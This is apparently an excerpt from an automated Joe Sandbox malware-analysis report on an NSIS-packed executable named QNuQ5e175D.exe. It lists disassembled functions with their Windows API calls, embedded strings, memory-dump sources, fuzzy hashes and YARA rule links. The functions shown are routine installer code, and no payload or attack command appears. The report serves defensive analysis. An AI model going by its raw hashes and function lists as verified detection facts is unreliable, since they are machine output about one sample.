                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404863
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004048A6
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004048B4
                                                        • SetCursor.USER32(00000000), ref: 004048B7
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004048D0
                                                        • SetCursor.USER32(00000000), ref: 004048D3
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404902
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404914
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: ,F@$Call$N
                                                        • API String ID: 3103080414-1948516150
                                                        • Opcode ID: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                        • Instruction ID: ccb0ec9a7d9d767aff215416cd1a2e620de701fb5c4a8d8609e67ea5798c0c5e
                                                        • Opcode Fuzzy Hash: ffd7346a229d966f7877475afaa511d8b27e78dae7af650fbb9c2f9128a087cb
                                                        • Instruction Fuzzy Hash: 046192F1900209BFDB10AF64DD85EAA7B69FB84315F00853AFB05B65E0C778A951CF98
                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                        • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                        • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                        • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                        Function 004061BD Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406358,?,?), ref: 004061F8
                                                        • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 00406201
                                                          • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                          • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                        • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 0040621E
                                                        • wsprintfA.USER32 ref: 0040623C
                                                        • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406277
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406286
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004062BE
                                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406314
                                                        • GlobalFree.KERNEL32(00000000), ref: 00406325
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040632C
                                                          • Part of subcall function 00406067: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                          • Part of subcall function 00406067: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %ls=%ls$[Rename]
                                                        • API String ID: 2171350718-461813615
                                                        • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                        • Instruction ID: 21ba76f912769f78f8e3df01d85e3e27af82f360ac84a16f7af8f01611abcd2b
                                                        • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                        • Instruction Fuzzy Hash: 66314330240325BBD2206B659D48F6B3B6CDF45708F16043EFD42B62C2DA3C982486BD
                                                        Function 00406825 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\QNuQ5e175D.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                        • CharPrevW.USER32(?,?,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                        Strings
                                                        • "C:\Users\user\Desktop\QNuQ5e175D.exe", xrefs: 00406869
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406826
                                                        • *?|<>/":, xrefs: 00406877
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-13023802
                                                        • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                        • Instruction ID: bedb2e6347f460b6a244a356934bd0223db9426f0f89d28790e15ec7ef568a4f
                                                        • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                        • Instruction Fuzzy Hash: C911B66780221295DB303B148C40A7762A8AF59754F56C43FED86732C0E77C5C9282AD
                                                        Function 0040455D Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040457A
                                                        • GetSysColor.USER32(00000000), ref: 004045B8
                                                        • SetTextColor.GDI32(?,00000000), ref: 004045C4
                                                        • SetBkMode.GDI32(?,?), ref: 004045D0
                                                        • GetSysColor.USER32(?), ref: 004045E3
                                                        • SetBkColor.GDI32(?,?), ref: 004045F3
                                                        • DeleteObject.GDI32(?), ref: 0040460D
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404617
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                        • Instruction ID: 3bf72a8e0ffa46ee4049c610ab3cabbd6d50cfb344f29d4a8179c655b9565abb
                                                        • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                        • Instruction Fuzzy Hash: 5C2165B1500B04ABC7319F38DE08B577BF4AF41715F04892EEA96A26E0D739D944CB54
                                                        Function 73B02480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B025C2
                                                          • Part of subcall function 73B012CC: lstrcpynW.KERNEL32(00000000,?,73B0137F,00000019,73B011CA,-000000A0), ref: 73B012DC
                                                        • GlobalAlloc.KERNEL32(00000040), ref: 73B02548
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73B02563
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                        • String ID: @Hxv
                                                        • API String ID: 4216380887-2589555886
                                                        • Opcode ID: edf46bf865ca836839d8b2610bfbae5fa230864a08944080cc65a43ce577090b
                                                        • Instruction ID: 44206d4262fdd86489251007a9cfb8268f098ca7fa9391debde2988d7d775d37
                                                        • Opcode Fuzzy Hash: edf46bf865ca836839d8b2610bfbae5fa230864a08944080cc65a43ce577090b
                                                        • Instruction Fuzzy Hash: 9441B2B1008309DFE724EF65D990B2A7FB8FB94314F20853DE94A8B681F730A548CB61
                                                        Function 00404EB1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404ECC
                                                        • GetMessagePos.USER32 ref: 00404ED4
                                                        • ScreenToClient.USER32(?,?), ref: 00404EEE
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404F00
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F26
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                        • Instruction ID: fe1e2a7802b6c51c8f018a14413b1ee553013da7dc16083b389f375565560bf3
                                                        • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                        • Instruction Fuzzy Hash: 20015E71900219BADB00DB94DD85BFEBBBCAF95711F10412BBB51B61D0C7B4AA418BA4
                                                        Function 00401E73 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401E76
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                        • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401EF8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID: Times New Roman
                                                        • API String ID: 3808545654-927190056
                                                        • Opcode ID: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                        • Instruction ID: 32ce691c062fdf7882ca7c79f7dc95dd78c7e40f541a0607bb82830de01dd458
                                                        • Opcode Fuzzy Hash: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                        • Instruction Fuzzy Hash: 3C017171905250EFE7005BB4EE49BDD3FA4AB19301F208A7AF142B61E2CBB904458BED
                                                        Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                        • MulDiv.KERNEL32(0008E45C,00000064,0008ED68), ref: 00403001
                                                        • wsprintfW.USER32 ref: 00403011
                                                        • SetWindowTextW.USER32(?,?), ref: 00403021
                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                        Strings
                                                        • verifying installer: %d%%, xrefs: 0040300B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%
                                                        • API String ID: 1451636040-82062127
                                                        • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                        • Instruction ID: de78d71e2fb772fb87643f85aa6fa794cb5f2d0f129fd79c7e15704eeb750e6f
                                                        • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                        • Instruction Fuzzy Hash: 85014F71640208BBEF209F60DD49FEE3B79AB04344F008039FA02B51D0DBB996559B59
                                                        Function 73B02655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 73B012BB: GlobalAlloc.KERNELBASE(00000040,?,73B012DB,?,73B0137F,00000019,73B011CA,-000000A0), ref: 73B012C5
                                                        • GlobalFree.KERNEL32(?), ref: 73B02743
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B02778
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: 186ac7162cade3a1f7d8ec37e9420d486dbd8699fb215bcafbdfc0bb6662422b
                                                        • Instruction ID: 572ef8a273f600c9bb1869a8aaf83870e4022627f361d04f665ffb4d902b2c65
                                                        • Opcode Fuzzy Hash: 186ac7162cade3a1f7d8ec37e9420d486dbd8699fb215bcafbdfc0bb6662422b
                                                        • Instruction Fuzzy Hash: F431F2B2504109EFE7269F65CBC4F2E7FBAFB853087245539F2459BA60E7309C088B61
                                                        Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                        • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                        • Instruction ID: fd7949a1005e62e73a365a75524f2bbb059e9229dbd09bef2f8decdc6a7611be
                                                        • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                        • Instruction Fuzzy Hash: FA31A271D00124BBCF21AFA5CE89D9E7E79AF45324F14423AF421762E1CB798D418FA8
                                                        Function 00405F4E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F04
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F1C
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405FA7
